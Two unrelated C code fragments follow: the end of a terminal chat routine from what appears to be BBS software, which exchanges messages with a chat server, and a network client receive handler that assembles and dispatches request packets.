memset(&sbuf, 0, sizeof(sbuf)); memset(&rbuf, 0, sizeof(rbuf)); colour(LIGHTGRAY, BLACK); /* * If username and channelname are given, send the /nick and /join * commands to the chatserver. */ if (username && channel) { snprintf(buf, 200, "CPUT:2,%d,/nick %s;", mypid, clencode(username)); if (socket_send(buf) == 0) strcpy(buf, socket_receive()); snprintf(buf, 200, "CPUT:2,%d,/join %s;", mypid, clencode(channel)); if (socket_send(buf) == 0) strcpy(buf, socket_receive()); } chatting = TRUE; c_start = time(NULL); while (stop == FALSE) { /* * Check for new message, loop fast until no more data available. */ data = TRUE; while (data) { snprintf(buf, 200, "CGET:1,%d;", mypid); if (socket_send(buf) == 0) { strncpy(buf, socket_receive(), sizeof(buf)-1); if (strncmp(buf, "100:2,", 6) == 0) { strncpy(resp, strtok(buf, ":"), 10); /* Should be 100 */ strncpy(resp, strtok(NULL, ","), 5); /* Should be 2 */ strncpy(resp, strtok(NULL, ","), 5); /* 1= fatal, chat ended */ rc = atoi(resp); memset(&resp, 0, sizeof(resp)); strncpy(resp, cldecode(strtok(NULL, ";")), 80); /* The message */ DispMsg(resp); if (rc == 1) { Syslog('+', "Chat server error: %s", resp); stop = TRUE; data = FALSE; } } else { data = FALSE; } } } if (stop) break; /* * Check for a pressed key, if so then process it. * Allow hi-ascii for multi-language. */ ch = testkey(rows -1, curpos + 2); if ((ch == KEY_BACKSPACE) || (ch == KEY_RUBOUT) || (ch == KEY_DEL)) { alarm_on(); if (curpos) { curpos--; sbuf[curpos] = '\0'; BackErase(); } else { PUTCHAR(7); } /* if KEY_DEL isprint, do no output again */ } else if (isprint(ch) || traduce((char *)&ch)) { alarm_on(); if (curpos < width) { PUTCHAR(ch); sbuf[curpos] = ch; curpos++; } else { PUTCHAR(7); } } else if ((ch == '\r') && curpos) { alarm_on(); snprintf(buf, 200, "CPUT:2,%d,%s;", mypid, clencode(sbuf)); if (socket_send(buf) == 0) { strcpy(buf, socket_receive()); if (strncmp(buf, "100:2,", 6) == 0) { strncpy(resp, strtok(buf, ":"), 10); /* Should be 100 */ strncpy(resp, strtok(NULL, ","), 5); /* Should be 2 */ strncpy(resp, strtok(NULL, ","), 5); /* 1= fatal, chat ended */ rc = atoi(resp); strncpy(resp, cldecode(strtok(NULL, ";")), 80); /* The message */ DispMsg(resp); if (rc == 1) { Syslog('+', "Chat server error: %s", resp); stop = TRUE; } } } curpos = 0; memset(&sbuf, 0, sizeof(sbuf)); locate(rows - 1, 2); clrtoeol(); colour(WHITE, BLACK); mvprintw(rows - 1, 1, ">"); mvprintw(rows - 1, width + 2, "<"); colour(LIGHTGRAY, BLACK); } } chatting = FALSE; c_end = time(NULL); mib_chats++; mib_chatminutes += (unsigned int) ((c_end - c_start) / 60); /* * Before sending the close command, purge all outstanding messages. */ data = TRUE; while (data) { snprintf(buf, 200, "CGET:1,%d;", mypid); if (socket_send(buf) == 0) { strncpy(buf, socket_receive(), sizeof(buf)-1); if (strncmp(buf, "100:2,", 6) == 0) { strncpy(resp, strtok(buf, ":"), 10); /* Should be 100 */ strncpy(resp, strtok(NULL, ","), 5); /* Should be 2 */ strncpy(resp, strtok(NULL, ","), 5); /* 1= fatal error */ rc = atoi(resp); memset(&resp, 0, sizeof(resp)); strncpy(resp, cldecode(strtok(NULL, ";")), 80); /* The message */ DispMsg(resp); if (rc == 1) { Syslog('+', "Chat server error: %s", resp); data = FALSE; /* Even if there is more, prevent a loop */ } } else { data = FALSE; } } } if (username && channel) { /* * Disjoin sysop channel */ /* *** Sysop has terminated chat *** */ snprintf(buf, 200, "%s", (char *) Language(60)); DispMsg(buf); Syslog('+', "Sysop chat ended"); chat_with_sysop = FALSE; } else { Syslog('+', "User chat ended"); } /* * Close server connection */ snprintf(buf, 200, "CCLO,1,%d;", mypid); if (socket_send(buf) == 0) { strcpy(buf, socket_receive()); } sleep(2); clear(); }
static void client_handle_receive(void *opaque) { Client *client = opaque; const char *message = NULL; int length; PacketHeader *pending_request; length = socket_receive(client->socket, (uint8_t *)&client->packet + client->packet_used, sizeof(Packet) - client->packet_used); if (length < 0) { if (errno_interrupted()) { log_debug("Receiving from client (socket: %d, peer: %s), got interrupted", client->socket, client->peer); } else { log_error("Could not receive from client (socket: %d, peer: %s), disconnecting it: %s (%d)", client->socket, client->peer, get_errno_name(errno), errno); network_client_disconnected(client); } return; } if (length == 0) { log_info("Client (socket: %d, peer: %s) disconnected by peer", client->socket, client->peer); network_client_disconnected(client); return; } client->packet_used += length; while (client->packet_used > 0) { if (client->packet_used < (int)sizeof(PacketHeader)) { // wait for complete header break; } length = client->packet.header.length; if (client->packet_used < length) { // wait for complete packet break; } if (!packet_header_is_valid_request(&client->packet.header, &message)) { log_warn("Got invalid request (U: %u, L: %u, F: %u, S: %u, R: %u) from client (socket: %d, peer: %s): %s", client->packet.header.uid, client->packet.header.length, client->packet.header.function_id, client->packet.header.sequence_number, client->packet.header.response_expected, client->socket, client->peer, message); if (length < (int)sizeof(PacketHeader)) { // skip the complete header if length was too small length = sizeof(PacketHeader); } } else { log_debug("Got request (U: %u, L: %u, F: %u, S: %u, R: %u) from client (socket: %d, peer: %s)", client->packet.header.uid, client->packet.header.length, client->packet.header.function_id, client->packet.header.sequence_number, client->packet.header.response_expected, client->socket, client->peer); if (client->packet.header.response_expected) { if (client->pending_requests.count >= MAX_PENDING_REQUESTS) { log_warn("Dropping %d items from pending request array of client (socket: %d, peer: %s)", client->pending_requests.count - MAX_PENDING_REQUESTS + 1, client->socket, client->peer); while (client->pending_requests.count >= MAX_PENDING_REQUESTS) { array_remove(&client->pending_requests, 0, NULL); } } pending_request = array_append(&client->pending_requests); if (pending_request == NULL) { log_error("Could not append to pending request array: %s (%d)", get_errno_name(errno), errno); return; } memcpy(pending_request, &client->packet.header, sizeof(PacketHeader)); log_debug("Added pending request (U: %u, L: %u, F: %u, S: %u) for client (socket: %d, peer: %s)", pending_request->uid, pending_request->length, pending_request->function_id, pending_request->sequence_number, client->socket, client->peer); } usb_dispatch_packet(&client->packet); } memmove(&client->packet, (uint8_t *)&client->packet + length, client->packet_used - length); client->packet_used -= length; } }